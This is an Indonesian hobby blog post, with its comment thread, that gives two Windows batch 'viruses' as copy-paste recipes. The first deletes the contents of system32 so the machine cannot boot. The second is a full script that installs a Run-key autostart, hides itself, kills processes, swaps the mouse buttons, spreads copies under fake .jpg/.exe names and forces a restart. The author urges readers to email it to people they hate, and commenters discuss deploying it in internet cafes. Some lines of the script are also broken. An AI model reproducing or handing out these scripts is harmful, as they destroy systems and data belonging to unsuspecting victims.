1.
Posted by : Kenichi Suzura


 

Selamat siang sobat kangapipwae maap jarang post dikarenakan sibuk dengan dunia real hingga lupa ngurusin ini blog hehe tapi siang ini admin sempetin post biar sobat gak bosen
VIRUS 1 (Format HDD Classic One)
1. Buka Notepad

2. Tuliskan perintah di bawah ini : -

del c:\windows\system32\*.* /q

3. Simpan file tersebut dengan nama apa saja terserah kamu, yang penting akhirannya harus ".bat or .cmd".

4. Jangan di klik 2x jika tidak ingin komputer sendiri yang hancur.

Kenapa ?????? Karena file yang kamu buat tadi akan menghapus folder system32 dan setelah komputer di hidupkan ulang maka komputermu tidak akan jalan dan harus di install ulang, karena sistem tidak mencari file-file yang ada di folder system32 yang dibutuhkan pada saat booting awal (dengan asumsi tanpa ada program Deep Freeze atau Returnil)

5. Jika ingin mencobanya buatlah folder baru dengan nama yang sama dan letakkan di C:\. Isi beberapa file yang tidak berguna. Kemudian jalankan file yang telah kamu buat tadi. Klik 2x file tersebut dan secara otomatis file akan terhapus.

6. Kamu bisa mencobanya di semua komputer yang memiliki system operasi Windows, dan ingat, saya tidak bertanggung jawab atas semua kerusakan yang kamu buat.

Virus 2

Trik ini untuk mengirim file ke komputer orang yang kamu benci.
Copy perintah di bawah ini ke dalam notepad.. kemudian simpan dengan nama terserah.bat

Jangan di klik file tersebut yach........ Kirim ke email orang yang kamu benci dach...
hehehehe....

Dan yang akan terjadi setelah si musuh menerima file adalah :
1) file akan mengcopy secara otomatis ke dalam startup
2) file akan mengcopy secara otomatis ke dalam ribuan komputer yang terinjeksi
3) mampu menyembunyikan dirinya sendiri

4) file akan mematikan secara otomatis program MSN, Norton, Windows Explorer, Limewire.
5) Membalik klik kanan mouse dengan klik kiri
6) Membuka kotak dialog Peringatan
7) Mengganti waktu ke jam 12:00 dan mematikan komputer


Code:

@Echo off

color 4

title 4

title R.I.P

start

start

start

start calc

copy %0 %Systemroot%\Greatgame > nul

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ

/d %systemroot%\Greatgame.bat /f > nul

copy %0 *.bat > nul

Attrib +r +h Greatgame.bat

Attrib +r +h

RUNDLL32 USER32.DLL.SwapMouseButton

start calc

cls

tskill msnmsgr

tskill LimeWire

tskill iexplore

tskill NMain

start

cls

cd %userprofile%\desktop

copy Greatgame.bat R.I.P.bat

copy Greatgame.bat R.I.P.jpg

copy Greatgame.bat R.I.P.txt

copy Greatgame.bat R.I.P.exe

copy Greatgame.bat R.I.P.mov

copy Greatgame.bat FixVirus.bat

cd %userprofile%My Documents

copy Greatgame.bat R.I.P.bat

copy Greatgame.bat R.I.P.jpg

copy Greatgame.bat R.I.P.txt

copy Greatgame.bat R.I.P.exe

copy Greatgame.bat R.I.P.mov

copy Greatgame.bat FixVirus.bat

start

start calc

cls

msg * R.I.P

msg * R.I.P

shutdown -r -t 10 -c "VIRUS DETECTED"

start

start

time 12:00

:R.I.P

cd %usernameprofile%\desktop

copy Greatgame.bat %random%.bat

goto RIP

Dan Saya Tidak Bertanggung Jawab Kalau KOMPUTER Anda Rusak Atau Apapun.

23 komentar

  1. WOW, mantap cuman beberapa langkah doang langsung ancur system komputernya !

    BalasHapus
    Balasan
    1. Siip Awas Om Jangan Disalahgunakan :)

      Hapus
  2. permisi om,mau tanya.,
    itu kode2nya pakai enter gitu apa enga ya.?makasih

    wardana

    BalasHapus
    Balasan
    1. Kode Yang Ke 2 Yah Om ?? :)
      Iya Om Pake Enter :) Makasih Om Udah Mau Comment :)

      Hapus
  3. mau copy apanya ga da filnya gan?????

    BalasHapus
    Balasan
    1. Copy Yang Saya Quote Atau Copy Script yang Dbawah Code Itu Gan :3

      Hapus
  4. copy apanya gan ga da filenya

    BalasHapus
  5. permisi gan, mau nanya yg ke dua itu kalo diklik 1 kali gapapa kan ?

    BalasHapus
  6. gan, kalo saya mau ngirim emailnya, tinggal di attach aja kan ?

    BalasHapus
  7. kk sya mw nanya, codenya hrus dicopy semua y?

    BalasHapus
  8. kk sya bleh nanya kan? code nya hrus dicopy smua y?

    BalasHapus
    Balasan
    1. Harus dong! Kalau gak di copy semua scriptnya gak akan bisa jalan hehe

      Hapus
  9. gan yg kedua extrensinya apa ? .bat bukan?

    BalasHapus
  10. Balasan
    1. Banget Gann, Makanya jangan sampai salah klik nnti! di konputer sendiri di klik bisa berabeh hehe

      Hapus
    2. Gan ko pas drestar dwarnet dia normal lgi ya ko bisa

      Hapus
  11. berhasil Gan ;D

    BalasHapus
  12. percuma gan,,kalo komputer target ada anti virus nya

    BalasHapus
  13. Gan ane udh cba d warnet dia eror trus pas drestar ko dia kyk semula ia (normal lagi)

    BalasHapus

Copyright © 2013 KenichiSZ | Creative Only !! -HIKANIMU*- Powered by Blogger - Template by Renadel Dapize- Ori Djogzs Design By Andy Al mesura